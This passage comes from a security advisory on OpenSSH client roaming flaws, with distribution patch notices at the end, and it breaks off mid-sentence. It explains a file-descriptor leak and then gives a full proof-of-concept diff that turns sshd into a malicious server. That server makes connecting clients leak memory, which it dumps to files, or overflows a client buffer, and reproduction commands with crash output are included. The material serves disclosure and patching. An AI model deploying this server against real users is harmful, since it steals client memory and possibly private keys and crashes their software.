Descriptor Leak\n------------------------------------------------------------------------\n\nA back-of-the-envelope calculation indicates that, in order to increase\nthe file descriptor connection_in or connection_out, and thus overflow\nthe file descriptor set setp in packet_read_seqnr() or\npacket_write_wait(), a file descriptor leak is needed:\n\n- First, the number of bytes calloc()ated for setp is rounded up to the\n nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors)\n on 64-bit systems. \n\n- Next, in glibc, this number is rounded up to the nearest multiple of\n MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit\n systems. \n\n- Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit\n systems, of which 24 bytes (or 192 file descriptors) are reserved for\n setp. \n\n- In conclusion, a file descriptor leak is needed, because connection_in\n or connection_out has to be increased by hundreds in order to overflow\n setp. \n\nThe search for a suitable file descriptor leak begins with a study of\nthe behavior of the four ssh_connect() methods, when called for a\nreconnection by wait_for_roaming_reconnect():\n\n1. The default method ssh_connect_direct() communicates with the server\nthrough a simple TCP socket: the two file descriptors connection_in and\nconnection_out are both equal to this socket\u0027s file descriptor. \n\nIn wait_for_roaming_reconnect(), the low-numbered file descriptor of the\nold TCP socket is close()d by packet_backup_state(), but immediately\nreused for the new TCP socket in ssh_connect_direct(): the new file\ndescriptors connection_in and connection_out are equal to this old,\nlow-numbered file descriptor, and cannot possibly overflow setp. \n\n2. The special ProxyCommand \"-\" communicates with the server through\nstdin and stdout, but (as explained in the Mitigating Factors of the\nInformation Leak section) it cannot possibly reconnect to the server,\nand is therefore immune to this buffer overflow. \n\n3. Surprisingly, we discovered a file descriptor leak in the\nssh_proxy_fdpass_connect() method itself; indeed, the file descriptor\nsp[1] is never close()d:\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 106 int sp[2], sock;\n ... \n 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) \u003c 0)\n 114 fatal(\"Could not create socketpair to communicate with \"\n 115 \"proxy dialer: %.100s\", strerror(errno));\n ... \n 161 close(sp[0]);\n ... \n 164 if ((sock = mm_receive_fd(sp[1])) == -1)\n 165 fatal(\"proxy dialer did not pass back a connection\");\n ... \n 171 /* Set the connection file descriptors. */\n 172 packet_set_connection(sock, sock);\n 173\n 174 return 0;\n 175 }\n\nHowever, two different reasons prevent this file descriptor leak from\ntriggering the setp overflow:\n\n- The method ssh_proxy_fdpass_connect() communicates with the server\n through a single socket received from the ProxyCommand: the two file\n descriptors connection_in and connection_out are both equal to this\n socket\u0027s file descriptor. \n\n In wait_for_roaming_reconnect(), the low-numbered file descriptor of\n the old socket is close()d by packet_backup_state(), reused for sp[0]\n in ssh_proxy_fdpass_connect(), close()d again, and eventually reused\n again for the new socket: the new file descriptors connection_in and\n connection_out are equal to this old, low-numbered file descriptor,\n and cannot possibly overflow setp. \n\n- Because of the waitpid() bug described in the Mitigating Factors of\n the Information Leak section, the method ssh_proxy_fdpass_connect()\n calls fatal() before it returns to wait_for_roaming_reconnect(), and\n is therefore immune to this buffer overflow. \n\n4. The method ssh_proxy_connect() communicates with the server through a\nProxyCommand and two different pipes: the file descriptor connection_in\nis the read end of the second pipe (pout[0]), and the file descriptor\nconnection_out is the write end of the first pipe (pin[1]):\n\n 180 static int\n 181 ssh_proxy_connect(const char *host, u_short port, const char *proxy_command)\n 182 {\n ... \n 184 int pin[2], pout[2];\n ... \n 192 if (pipe(pin) \u003c 0 || pipe(pout) \u003c 0)\n 193 fatal(\"Could not create pipes to communicate with the proxy: %.100s\",\n 194 strerror(errno));\n ... \n 240 /* Close child side of the descriptors. */\n 241 close(pin[0]);\n 242 close(pout[1]);\n ... \n 247 /* Set the connection file descriptors. */\n 248 packet_set_connection(pout[0], pin[1]);\n 249\n 250 /* Indicate OK return */\n 251 return 0;\n 252 }\n\nIn wait_for_roaming_reconnect(), the two old, low-numbered file\ndescriptors connection_in and connection_out are both close()d by\npacket_backup_state(), and immediately reused for the pipe(pin) in\nssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of\nthese old, low-numbered file descriptors, and cannot possibly overflow\nsetp. \n\nOn the other hand, the pipe(pout) in ssh_proxy_connect() may return\nhigh-numbered file descriptors, and the new connection_in (pout[0]) may\ntherefore overflow setp, if hundreds of file descriptors were leaked\nbefore the call to wait_for_roaming_reconnect():\n\n- We discovered a file descriptor leak in the pubkey_prepare() function\n of OpenSSH \u003e= 6.8; indeed, if the client is running an authentication\n agent that does not offer any private keys, the reference to agent_fd\n is lost, and this file descriptor is never close()d:\n\n1194 static void\n1195 pubkey_prepare(Authctxt *authctxt)\n1196 {\n.... \n1200 int agent_fd, i, r, found;\n.... \n1247 if ((r = ssh_get_authentication_socket(\u0026agent_fd)) != 0) {\n1248 if (r != SSH_ERR_AGENT_NOT_PRESENT)\n1249 debug(\"%s: ssh_get_authentication_socket: %s\",\n1250 __func__, ssh_err(r));\n1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, \u0026idlist)) != 0) {\n1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES)\n1253 debug(\"%s: ssh_fetch_identitylist: %s\",\n1254 __func__, ssh_err(r));\n1255 } else {\n.... \n1288 authctxt-\u003eagent_fd = agent_fd;\n1289 }\n.... \n1299 }\n\n However, OpenSSH clients \u003e= 6.8 crash in ssh_packet_restore_state()\n (because of the NULL-pointer dereference discussed in the Mitigating\n Factors of the Buffer Overflow section) and are immune to the setp\n overflow, despite this agent_fd leak. \n\n- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH\n client (it is disabled by default), a malicious SSH server can request\n hundreds of forwardings, in order to increase connection_in (each\n forwarding opens a file descriptor), and thus overflow setp in\n packet_read_seqnr():\n\n# env ROAMING=\"overflow:A\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007f0474d03e70 ***\nAborted (core dumped)\n\n# env ROAMING=\"overflow:X\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/ssh -X -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***\n*** Error in `/usr/bin/ssh\u0027: malloc(): memory corruption: 0x00007fdcc2a3abc0 ***\n\nFinally, a brief digression on two unexpected problems that had to be\nsolved in our proof-of-concept:\n\n- First, setp can be overflowed only in packet_read_seqnr(), not in\n packet_write_wait(), but agent forwarding and X11 forwarding are post-\n authentication functionalities, and post-authentication calls to\n packet_read() or packet_read_expect() are scarce, except in the\n key-exchange code of OpenSSH clients \u003c 6.8: our proof-of-concept\n effectively forces a rekeying in order to overflow setp in\n packet_read_seqnr(). \n\n- Second, after a successful reconnection, packet_read_seqnr() may call\n fatal(\"Read from socket failed: %.100s\", ...), because roaming_read()\n may return EAGAIN (EAGAIN is never returned without the reconnection,\n because the preceding call to select() guarantees that connection_in\n is ready for read()). Our proof-of-concept works around this problem\n by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server,\n allowing data to reach the client before roaming_read() is called,\n thus avoiding EAGAIN. \n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe would like to thank the OpenSSH developers for their great work and\ntheir incredibly quick response, Red Hat Product Security for promptly\nassigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall\nProject for the interesting discussions. \n\n\n========================================================================\nProof Of Concept\n========================================================================\n\ndiff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c\n--- openssh-6.4p1/auth2-pubkey.c\t2013-07-17 23:10:10.000000000 -0700\n+++ openssh-6.4p1+roaming/auth2-pubkey.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -169,7 +169,9 @@ userauth_pubkey(Authctxt *authctxt)\n \t\t * if a user is not allowed to login. is this an\n \t\t * issue? -markus\n \t\t */\n-\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key))) {\n+\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key)) || 1) {\n+\t\t\tdebug(\"%s: force client-side load_identity_file\",\n+\t\t\t __func__);\n \t\t\tpacket_start(SSH2_MSG_USERAUTH_PK_OK);\n \t\t\tpacket_put_string(pkalg, alen);\n \t\t\tpacket_put_string(pkblob, blen);\ndiff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c\n--- openssh-6.4p1/kex.c\t2013-06-01 14:31:18.000000000 -0700\n+++ openssh-6.4p1+roaming/kex.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX],\n }\n \n static void\n+roaming_reconnect(void)\n+{\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_RESUME);\n+\tconst u_int id = packet_get_int(); /* roaming_id */\n+\tdebug(\"%s: id %u\", __func__, id);\n+\tpacket_check_eom();\n+\n+\tconst char *const dir = get_roaming_dir(id);\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tconst int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, dir, errno);\n+\tif (fchdir(fd) != 0)\n+\t\tfatal(\"%s: fchdir %s errno %d\", __func__, dir, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, dir, errno);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED);\n+\tpacket_put_int64(arc4random()); /* chall */\n+\tpacket_put_int64(arc4random()); /* oldchall */\n+\tpacket_send();\n+\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_AUTH);\n+\tconst u_int64_t client_read_bytes = packet_get_int64();\n+\tdebug(\"%s: client_read_bytes %llu\", __func__,\n+\t (unsigned long long)client_read_bytes);\n+\tpacket_get_int64(); /* digest (1-8) */\n+\tpacket_get_int64(); /* digest (9-16) */\n+\tpacket_get_int(); /* digest (17-20) */\n+\tpacket_check_eom();\n+\n+\tu_int64_t client_write_bytes;\n+\tsize_t len = sizeof(client_write_bytes);\n+\tload_roaming_file(\"client_write_bytes\", \u0026client_write_bytes, \u0026len);\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\n+\tu_int client_out_buf_size;\n+\tlen = sizeof(client_out_buf_size);\n+\tload_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size, \u0026len);\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0 || client_out_buf_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: client_out_buf_size %u\", __func__,\n+\t\t\t client_out_buf_size);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_OK);\n+\tpacket_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size);\n+\tpacket_send();\n+\tconst int overflow = (access(\"output\", F_OK) == 0);\n+\tif (overflow != 0) {\n+\t\tconst void *const ptr = load_roaming_file(\"output\", NULL, \u0026len);\n+\t\tbuffer_append(packet_get_output(), ptr, len);\n+\t}\n+\tpacket_write_wait();\n+\n+\tchar *const client_out_buf = xmalloc(client_out_buf_size);\n+\tif (atomicio(read, packet_get_connection_in(), client_out_buf,\n+\t\t\t client_out_buf_size) != client_out_buf_size)\n+\t\tfatal(\"%s: read client_out_buf_size %u errno %d\", __func__,\n+\t\t\t\tclient_out_buf_size, errno);\n+\tif (overflow == 0)\n+\t\tdump_roaming_file(\"infoleak\", client_out_buf,\n+\t\t\t\t\t client_out_buf_size);\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n kex_choose_conf(Kex *kex)\n {\n \tNewkeys *newkeys;\n@@ -470,6 +537,10 @@ kex_choose_conf(Kex *kex)\n \t\t\tkex-\u003eroaming = 1;\n \t\t\tfree(roaming);\n \t\t}\n+\t} else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) {\n+\t\troaming_reconnect();\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, KEX_RESUME);\n \t}\n \n \t/* Algorithm Negotiation */\ndiff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h\n--- openssh-6.4p1/roaming.h\t2011-12-18 15:52:52.000000000 -0800\n+++ openssh-6.4p1+roaming/roaming.h\t2016-01-07 01:04:15.000000000 -0800\n@@ -42,4 +42,86 @@ void\tresend_bytes(int, u_int64_t *);\n void\tcalculate_new_key(u_int64_t *, u_int64_t, u_int64_t);\n int\tresume_kex(void);\n \n+#include \u003cfcntl.h\u003e\n+#include \u003cstdio.h\u003e\n+#include \u003cstring.h\u003e\n+#include \u003csys/stat.h\u003e\n+#include \u003csys/types.h\u003e\n+#include \u003cunistd.h\u003e\n+\n+#include \"atomicio.h\"\n+#include \"log.h\"\n+#include \"xmalloc.h\"\n+\n+static inline char *\n+get_roaming_dir(const u_int id)\n+{\n+\tconst size_t buflen = MAXPATHLEN;\n+\tchar *const buf = xmalloc(buflen);\n+\n+\tif ((u_int)snprintf(buf, buflen, \"/tmp/roaming-%08x\", id) \u003e= buflen)\n+\t\tfatal(\"%s: snprintf %u error\", __func__, id);\n+\treturn buf;\n+}\n+\n+static inline void\n+dump_roaming_file(const char *const name,\n+ const void *const buf, const size_t buflen)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buf == NULL)\n+\t\tfatal(\"%s: %s buf %p\", __func__, name, buf);\n+\tif (buflen \u003c= 0 || buflen \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s buflen %lu\", __func__, name, (u_long)buflen);\n+\n+\tconst int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tif (write(fd, buf, buflen) != (ssize_t)buflen)\n+\t\tfatal(\"%s: write %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+}\n+\n+static inline void *\n+load_roaming_file(const char *const name,\n+ void *buf, size_t *const buflenp)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buflenp == NULL)\n+\t\tfatal(\"%s: %s buflenp %p\", __func__, name, buflenp);\n+\n+\tconst int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tstruct stat st;\n+\tif (fstat(fd, \u0026st) != 0)\n+\t\tfatal(\"%s: fstat %s errno %d\", __func__, name, errno);\n+\tif (S_ISREG(st.st_mode) == 0)\n+\t\tfatal(\"%s: %s mode 0%o\", __func__, name, (u_int)st.st_mode);\n+\tif (st.st_size \u003c= 0 || st.st_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s size %lld\", __func__, name,\n+\t\t (long long)st.st_size);\n+\n+\tif (buf == NULL) {\n+\t\t*buflenp = st.st_size;\n+\t\tbuf = xmalloc(*buflenp);\n+\t} else {\n+\t\tif (*buflenp != (size_t)st.st_size)\n+\t\t\tfatal(\"%s: %s size %lld buflen %lu\", __func__, name,\n+\t\t\t (long long)st.st_size, (u_long)*buflenp);\n+\t}\n+\tif (read(fd, buf, *buflenp) != (ssize_t)*buflenp)\n+\t\tfatal(\"%s: read %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+\treturn buf;\n+}\n+\n #endif /* ROAMING */\ndiff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c\n--- openssh-6.4p1/serverloop.c\t2013-07-17 23:12:45.000000000 -0700\n+++ openssh-6.4p1+roaming/serverloop.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -1060,6 +1060,9 @@ server_request_session(void)\n \treturn c;\n }\n \n+static int client_session_channel = -1;\n+static int server_session_channel = -1;\n+\n static void\n server_input_channel_open(int type, u_int32_t seq, void *ctxt)\n {\n@@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in\n \t\tc-\u003eremote_window = rwindow;\n \t\tc-\u003eremote_maxpacket = rmaxpack;\n \t\tif (c-\u003etype != SSH_CHANNEL_CONNECTING) {\n+\t\t\tdebug(\"%s: avoid client-side buf_append\", __func__);\n+\t\t\t/*\n \t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n \t\t\tpacket_put_int(c-\u003eremote_id);\n \t\t\tpacket_put_int(c-\u003eself);\n \t\t\tpacket_put_int(c-\u003elocal_window);\n \t\t\tpacket_put_int(c-\u003elocal_maxpacket);\n \t\t\tpacket_send();\n+\t\t\t*/\n+\t\t\tif (strcmp(ctype, \"session\") == 0) {\n+\t\t\t\tif (client_session_channel != -1)\n+\t\t\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t\t\t __func__, client_session_channel);\n+\t\t\t\tclient_session_channel = c-\u003eremote_id;\n+\t\t\t\tserver_session_channel = c-\u003eself;\n+\t\t\t}\n \t\t}\n \t} else {\n \t\tdebug(\"server_input_channel_open: failure %s\", ctype);\n@@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in\n }\n \n static void\n+roaming_disconnect(Kex *const kex)\n+{\n+\tconst char *cp, *roaming = getenv(\"ROAMING\");\n+\tif (roaming == NULL)\n+\t\troaming = \"infoleak\";\n+\tint overflow = 0;\n+\tif ((cp = strstr(roaming, \"overflow:\")) != NULL)\n+\t\toverflow = cp[9];\n+\n+\tconst u_int client_recv_buf_size = packet_get_int();\n+\tpacket_check_eom();\n+\tconst u_int server_recv_buf_size = get_recv_buf_size();\n+\tconst u_int server_send_buf_size = get_snd_buf_size();\n+\tdebug(\"%s: client_recv_buf_size %u\", __func__, client_recv_buf_size);\n+\tdebug(\"%s: server_recv_buf_size %u\", __func__, server_recv_buf_size);\n+\tdebug(\"%s: server_send_buf_size %u\", __func__, server_send_buf_size);\n+\n+\tu_int client_send_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_send_buf_size:\")) != NULL)\n+\t\tclient_send_buf_size = strtoul(cp + 21, NULL, 0);\n+\telse if (client_recv_buf_size == DEFAULT_ROAMBUF)\n+\t\tclient_send_buf_size = DEFAULT_ROAMBUF;\n+\telse {\n+\t\tconst u_int\n+\t\t max = MAX(client_recv_buf_size, server_recv_buf_size),\n+\t\t min = MIN(client_recv_buf_size, server_recv_buf_size);\n+\t\tif (min \u003c= 0)\n+\t\t\tfatal(\"%s: min %u\", __func__, min);\n+\t\tif (((u_int64_t)(max - min) * 1024) / min \u003c 1)\n+\t\t\tclient_send_buf_size = server_send_buf_size;\n+\t\telse\n+\t\t\tclient_send_buf_size = client_recv_buf_size;\n+\t}\n+\tdebug(\"%s: client_send_buf_size %u\", __func__, client_send_buf_size);\n+\tif (client_send_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_send_buf_size\", __func__);\n+\n+\tu_int id = 0;\n+\tchar *dir = NULL;\n+\tfor (;;) {\n+\t\tid = arc4random();\n+\t\tdebug(\"%s: id %u\", __func__, id);\n+\t\tfree(dir);\n+\t\tdir = get_roaming_dir(id);\n+\t\tif (mkdir(dir, S_IRWXU) == 0)\n+\t\t\tbreak;\n+\t\tif (errno != EEXIST)\n+\t\t\tfatal(\"%s: mkdir %s errno %d\", __func__, dir, errno);\n+\t}\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tif (chdir(dir) != 0)\n+\t\tfatal(\"%s: chdir %s errno %d\", __func__, dir, errno);\n+\n+\tu_int client_out_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_out_buf_size:\")) != NULL)\n+\t\tclient_out_buf_size = strtoul(cp + 20, NULL, 0);\n+\telse if (overflow != 0)\n+\t\tclient_out_buf_size = MAX_ROAMBUF;\n+\telse\n+\t\tclient_out_buf_size = 1 + arc4random() % 4096;\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_out_buf_size\", __func__);\n+\tdump_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size,\n+\t\t\t\t\t sizeof(client_out_buf_size));\n+\n+\tif ((cp = strstr(roaming, \"scp_mode\")) != NULL) {\n+\t\tif (overflow != 0)\n+\t\t\tfatal(\"%s: scp_mode is incompatible with overflow %d\",\n+\t\t\t __func__, overflow);\n+\n+\t\tu_int seconds_left_to_sleep = 3;\n+\t\tif ((cp = strstr(cp, \"sleep:\")) != NULL)\n+\t\t\tseconds_left_to_sleep = strtoul(cp + 6, NULL, 0);\n+\t\tdebug(\"%s: sleep %u\", __func__, seconds_left_to_sleep);\n+\n+\t\tif (client_session_channel == -1)\n+\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t __func__, client_session_channel);\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_int(server_session_channel);\n+\t\tpacket_put_int(0); /* server window */\n+\t\tpacket_put_int(0); /* server maxpacket */\n+\t\tpacket_send();\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_DATA);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_string(\"\\0\\n\", 2); /* response\u0026source|sink\u0026run_err */\n+\t\tpacket_send();\n+\n+\t\tpacket_read_expect(SSH2_MSG_CHANNEL_REQUEST);\n+\t\tpacket_get_int(); /* server channel */\n+\t\tdebug(\"%s: channel request %s\", __func__,\n+\t\t packet_get_cstring(NULL));\n+\n+\t\twhile (seconds_left_to_sleep)\n+\t\t\tseconds_left_to_sleep = sleep(seconds_left_to_sleep);\n+\t}\n+\n+\tpacket_start(SSH2_MSG_REQUEST_SUCCESS);\n+\tpacket_put_int(id); /* roaming_id */\n+\tpacket_put_int64(arc4random()); /* cookie */\n+\tpacket_put_int64(0); /* key1 */\n+\tpacket_put_int64(0); /* key2 */\n+\tpacket_put_int(client_out_buf_size - client_send_buf_size);\n+\tpacket_send();\n+\tpacket_write_wait();\n+\n+\tif (overflow != 0) {\n+\t\tconst u_int64_t full_client_out_buf = get_recv_bytes() +\n+\t\t\t\t client_out_buf_size;\n+\n+\t\tu_int fd_leaks = 4 * 8 * 8; /* MIN_CHUNK_SIZE in bits */\n+\t\tif ((cp = strstr(roaming, \"fd_leaks:\")) != NULL)\n+\t\t\tfd_leaks = strtoul(cp + 9, NULL, 0);\n+\t\tdebug(\"%s: fd_leaks %u\", __func__, fd_leaks);\n+\n+\t\twhile (fd_leaks--) {\n+\t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN);\n+\t\t\tpacket_put_cstring(overflow == \u0027X\u0027 ? \"x11\" :\n+\t\t\t \"auth-agent@openssh.com\"); /* ctype */\n+\t\t\tpacket_put_int(arc4random()); /* server channel */\n+\t\t\tpacket_put_int(arc4random()); /* server window */\n+\t\t\tpacket_put_int(arc4random()); /* server maxpacket */\n+\t\t\tif (overflow == \u0027X\u0027) {\n+\t\t\t\tpacket_put_cstring(\"\"); /* originator */\n+\t\t\t\tpacket_put_int(arc4random()); /* port */\n+\t\t\t}\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\t\tpacket_get_int(); /* server channel */\n+\t\t\tpacket_get_int(); /* client channel */\n+\t\t\tpacket_get_int(); /* client window */\n+\t\t\tpacket_get_int(); /* client maxpacket */\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\twhile (get_recv_bytes() \u003c= full_client_out_buf) {\n+\t\t\tpacket_start(SSH2_MSG_GLOBAL_REQUEST);\n+\t\t\tpacket_put_cstring(\"\"); /* rtype */\n+\t\t\tpacket_put_char(1); /* want_reply */\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_REQUEST_FAILURE);\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\tif (kex == NULL)\n+\t\t\tfatal(\"%s: no kex, cannot rekey\", __func__);\n+\t\tif (kex-\u003eflags \u0026 KEX_INIT_SENT)\n+\t\t\tfatal(\"%s: KEX_INIT_SENT already\", __func__);\n+\t\tchar *const ptr = buffer_ptr(\u0026kex-\u003emy);\n+\t\tconst u_int len = buffer_len(\u0026kex-\u003emy);\n+\t\tif (len \u003c= 1+4) /* first_kex_follows + reserved */\n+\t\t\tfatal(\"%s: kex len %u\", __func__, len);\n+\t\tptr[len - (1+4)] = 1; /* first_kex_follows */\n+\t\tkex_send_kexinit(kex);\n+\n+\t\tu_int i;\n+\t\tpacket_read_expect(SSH2_MSG_KEXINIT);\n+\t\tfor (i = 0; i \u003c KEX_COOKIE_LEN; i++)\n+\t\t\tpacket_get_char();\n+\t\tfor (i = 0; i \u003c PROPOSAL_MAX; i++)\n+\t\t\tfree(packet_get_string(NULL));\n+\t\tpacket_get_char(); /* first_kex_follows */\n+\t\tpacket_get_int(); /* reserved */\n+\t\tpacket_check_eom();\n+\n+\t\tchar buf[8192*2]; /* two packet_read_seqnr bufferfuls */\n+\t\tmemset(buf, \u0027\\0\u0027, sizeof(buf));\n+\t\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL);\n+\t\tpacket_put_string(buf, sizeof(buf));\n+\t\tpacket_send();\n+\t\tconst Buffer *const output = packet_get_output();\n+\t\tdump_roaming_file(\"output\", buffer_ptr(output),\n+\t\t\t\t\t buffer_len(output));\n+\t}\n+\n+\tconst u_int64_t client_write_bytes = get_recv_bytes();\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\tdump_roaming_file(\"client_write_bytes\", \u0026client_write_bytes,\n+\t\t\t\t\t sizeof(client_write_bytes));\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n server_input_global_request(int type, u_int32_t seq, void *ctxt)\n {\n \tchar *rtype;\n@@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_\n \t} else if (strcmp(rtype, \"no-more-sessions@openssh.com\") == 0) {\n \t\tno_more_sessions = 1;\n \t\tsuccess = 1;\n+\t} else if (strcmp(rtype, ROAMING_REQUEST) == 0) {\n+\t\tif (want_reply != 1)\n+\t\t\tfatal(\"%s: rtype %s want_reply %d\", __func__,\n+\t\t\t\t rtype, want_reply);\n+\t\troaming_disconnect(ctxt);\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, ROAMING_REQUEST);\n \t}\n \tif (want_reply) {\n \t\tpacket_start(success ?\ndiff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c\n--- openssh-6.4p1/sshd.c\t2013-07-19 20:21:53.000000000 -0700\n+++ openssh-6.4p1+roaming/sshd.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -2432,6 +2432,8 @@ do_ssh2_kex(void)\n \t}\n \tif (options.kex_algorithms != NULL)\n \t\tmyproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms;\n+\telse\n+\t\tmyproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX \",\" KEX_RESUME;\n \n \tif (options.rekey_limit || options.rekey_interval)\n \t\tpacket_set_rekey_limits((u_int32_t)options.rekey_limit,\n. \n\nMore details about identifying an attack and mitigations will be\navailable in the Qualys Security Advisory. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:6.0p1-4+deb7u3. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:6.7p1-5+deb8u1. \n\nFor the testing distribution (stretch) and unstable distribution (sid), these\nproblems will be fixed in a later version. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssh-7.1p2-i486-1_slack14.1.txz: Upgraded. \n This update fixes an information leak and a buffer overflow. As of version\n 7.0, OpenSSH has deprecated some older (and presumably less secure)\n algorithms, and also (by default) only allows root login by public-key,\n hostbased and GSSAPI authentication. Make sure that your keys and\n authentication method will allow you to continue accessing your system\n after the upgrade. \n The release notes for OpenSSH 7.0 list the following incompatible changes\n to be aware of:\n * Support for the legacy SSH version 1 protocol is disabled by\n default at compile time. \n * Support for the 1024-bit diffie-hellman-group1-sha1 key exchange\n is disabled by default at run-time. It may be re-enabled using\n the instructions at http://www.openssh.com/legacy.html\n * Support for ssh-dss, ssh-dss-cert-* host and user keys is disabled\n by default at run-time. These may be re-enabled using the\n instructions at 